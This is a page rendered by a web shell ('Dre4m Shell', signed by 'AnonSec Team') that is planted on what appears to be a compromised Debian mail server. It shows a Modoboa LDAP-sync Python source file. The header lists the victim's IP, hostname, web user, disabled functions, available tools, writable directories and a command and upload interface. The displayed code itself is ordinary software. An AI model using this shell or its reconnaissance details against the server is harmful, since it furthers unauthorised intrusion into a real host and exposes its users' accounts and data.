Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.16.212.0
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib/python3.5/site-packages/modoboa/ldapsync/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib/python3.5/site-packages/modoboa/ldapsync/lib.py
"""LDAP related functions."""

import ldap
import ldap.modlist as modlist

from django.conf import settings
from django.utils.encoding import force_bytes, force_str
from django.utils.translation import ugettext as _

from modoboa.core import models as core_models
from modoboa.lib.email_utils import split_mailbox
from modoboa.lib.exceptions import InternalError


def create_connection(srv_address, srv_port, config, username, password):
    """Create a new connection with given server."""
    uri = "{}:{}".format(srv_address, srv_port)
    uri = "{}://{}".format(
        "ldaps" if config["ldap_secured"] == "ssl" else "ldap", uri)
    conn = ldap.initialize(uri)
    conn.protocol_version = 3
    conn.set_option(ldap.OPT_X_TLS_DEMAND, True)
    conn.set_option(ldap.OPT_DEBUG_LEVEL, 255)
    conn.set_option(ldap.OPT_REFERRALS, 0)
    conn.simple_bind_s(
        force_str(username if username else config["ldap_sync_bind_dn"]),
        force_str(password if password else config["ldap_sync_bind_password"])
    )
    return conn


def get_connection(config, username=None, password=None):
    """Get a new connection to the LDAP directory."""
    try:
        conn = create_connection(
            config["ldap_server_address"], config["ldap_server_port"],
            config, username, password
        )
    except ldap.LDAPError:
        if not config["ldap_enable_secondary_server"]:
            raise
        conn = create_connection(
            config["ldap_secondary_server_address"],
            config["ldap_secondary_server_port"],
            config, username, password
        )
    return conn


def get_user_password(user, disable=False):
    """Return ready-to-use password from user instance."""
    scheme, password = user.password.split("}")
    return (
        force_bytes(scheme) +
        b"}" +
        b"#" if disable else b"" +
        force_bytes(password)
    )


def create_ldap_account(user, dn, conn):
    """Create new account."""
    attrs = {
        "objectClass": [
            force_bytes("inetOrgPerson"), force_bytes("organizationalPerson")
        ],
        "uid": [force_bytes(user.username)],
        "sn": [force_bytes(user.last_name)],
        "givenName": [force_bytes(user.first_name)],
        "cn": [force_bytes(user.username)],
        "displayName": [force_bytes(user.fullname)],
        "mail": [
            force_bytes(user.email), force_bytes(user.secondary_email)],
        "homePhone": [force_bytes(user.phone_number)],
    }
    if user.password:
        scheme, password = user.password.split("}")
        attrs["userPassword"] = [get_user_password(user)]
    ldif = modlist.addModlist(attrs)
    try:
        conn.add_s(dn, ldif)
    except ldap.LDAPError as e:
        raise InternalError(
            _("Failed to create LDAP account: {}").format(e)
        )


def check_if_dn_exists(conn, dn):
    """Check if DN already exists in directory."""
    try:
        res = conn.search_s(
            force_str(dn), ldap.SCOPE_SUBTREE,
            force_str("(&(objectClass=inetOrgPerson))")
        )
        res = res[0][0]
    except ldap.LDAPError:
        return False
    return True


def update_ldap_account(user, config):
    """Update existing account."""
    dn = config["ldap_sync_account_dn_template"] % {"user": user.username}
    conn = get_connection(config)
    if not check_if_dn_exists(conn, dn):
        create_ldap_account(user, dn, conn)
        return
    ldif = [
        (ldap.MOD_REPLACE, "uid", force_bytes(user.username)),
        (ldap.MOD_REPLACE, "sn", force_bytes(user.last_name)),
        (ldap.MOD_REPLACE, "givenName", force_bytes(user.first_name)),
        (ldap.MOD_REPLACE, "cn", force_bytes(user.username)),
        (ldap.MOD_REPLACE, "displayName", force_bytes(user.fullname)),
        (ldap.MOD_REPLACE, "mail", force_bytes(user.email)),
        (ldap.MOD_REPLACE, "homePhone", force_bytes(user.phone_number)),
    ]
    if user.password:
        password = get_user_password(user, not user.is_active)
        ldif.append((ldap.MOD_REPLACE, "userPassword", password))
    try:
        conn.modify_s(dn, ldif)
    except ldap.LDAPError as e:
        raise InternalError(
            _("Failed to update LDAP account: {}").format(e))


def delete_ldap_account(user, config):
    """Delete remote LDAP account."""
    dn = config["ldap_sync_account_dn_template"] % {"user": user.username}
    conn = get_connection(config)
    if not check_if_dn_exists(conn, dn):
        return
    if config["ldap_sync_delete_remote_account"]:
        try:
            conn.delete_s(dn)
        except ldap.LDAPError as e:
            raise InternalError(
                _("Failed to delete LDAP account: {}").format(e)
            )
    else:
        password = get_user_password(user, True)
        ldif = [
            (ldap.MOD_REPLACE, "userPassword", password)
        ]
        try:
            conn.modify_s(dn, ldif)
        except ldap.LDAPError as e:
            raise InternalError(
                _("Failed to disable LDAP account: {}").format(e))


def find_user_groups(conn, config, dn, entry):
    """Retrieve groups for given user."""
    condition = (
        config["ldap_is_active_directory"] or
        config["ldap_group_type"] == "groupofnames"
    )
    if condition:
        flt = "(member={})".format(dn)
    elif config["ldap_group_type"] == "posixgroup":
        flt = "(memberUid={})".format(force_str(entry["uid"][0]))

    result = conn.search_s(
        config["ldap_groups_search_base"],
        ldap.SCOPE_SUBTREE,
        flt
    )
    groups = []
    for dn, entry in result:
        if not dn:
            continue
        groups.append(dn.split(',')[0].split('=')[1])
    return groups


def user_is_disabled(config, entry):
    """Check if LDAP user is disabled or not."""
    if config["ldap_is_active_directory"]:
        if "userAccountControl" in entry:
            value = int(force_str(entry["userAccountControl"][0]))
            return value == 514
    # FIXME: is there a way to detect a disabled user with OpenLDAP?
    return False


def import_accounts_from_ldap(config):
    """Import user accounts from LDAP directory."""
    conn = get_connection(config)
    result = conn.search_s(
        config["ldap_import_search_base"],
        ldap.SCOPE_SUBTREE,
        config["ldap_import_search_filter"]
    )
    admin_groups = config["ldap_admin_groups"].split(";")
    for dn, entry in result:
        if dn is None:
            continue
        role = "SimpleUsers"
        groups = find_user_groups(conn, config, dn, entry)
        for grp in admin_groups:
            if grp.strip() in groups:
                role = "DomainAdmins"
                break
        username = force_str(entry[config["ldap_import_username_attr"]][0])
        lpart, domain = split_mailbox(username)
        if domain is None:
            # Try to find associated email
            email = None
            for attr in ["mail", "userPrincipalName"]:
                if attr in entry:
                    email = force_str(entry[attr][0])
                    break
            if email is None:
                if grp == "SimpleUsers":
                    print("Skipping {} because no email found".format(dn))
                    continue
            else:
                username = email
        defaults = {
            "username": username.lower(),
            "is_local": False,
            "language": settings.LANGUAGE_CODE
        }
        user, created = core_models.User.objects.get_or_create(
            username__iexact=username,
            defaults=defaults
        )
        if created:
            core_models.populate_callback(user, role)

        attr_map = {
            "first_name": "givenName",
            "email": "mail",
            "last_name": "sn"
        }
        for attr, ldap_attr in attr_map.items():
            if ldap_attr in entry:
                setattr(user, attr, force_str(entry[ldap_attr][0]))
            user.is_active = not user_is_disabled(config, entry)
            user.save()

        # FIXME: handle delete and rename operations?


def build_ldap_uri(config, node=""):
    """ Building LDAP uris for dovecot conf """
    if node:
        node += "_"
    return "{}://{}:{}".format(
        "ldaps" if config["ldap_secured"] == "ssl" else "ldap",
        config["ldap_{}server_address".format(node)],
        config["ldap_{}server_port".format(node)]
    )


def update_dovecot_config_file(config):
    """Update dovecot configuration file from LDAP parameters."""
    conf_file = config["ldap_dovecot_conf_file"]

    # Hosts conf
    uris = build_ldap_uri(config)
    if config["ldap_enable_secondary_server"]:
        uris += " " + build_ldap_uri(config, "secondary")

    # Auth conf
    bind_dn = config["ldap_bind_dn"]
    bind_pwd = config["ldap_bind_password"]

    # Search conf
    base = config["ldap_search_base"]
    user_filter = config["ldap_search_filter"].replace("(user)s", "u")

    with open(conf_file, "w") as fp:
        fp.write("""uris = {uris}
dn = "{bind_dn}"
dnpass = '{bind_pwd}'
base = {base}
user_filter = {user_filter}
pass_filter = {pass_filter}
""".format(uris=uris, bind_dn=bind_dn, bind_pwd=bind_pwd, base=base,
           user_filter=user_filter, pass_filter=user_filter)
        )

Anon7 - 2022
AnonSec Team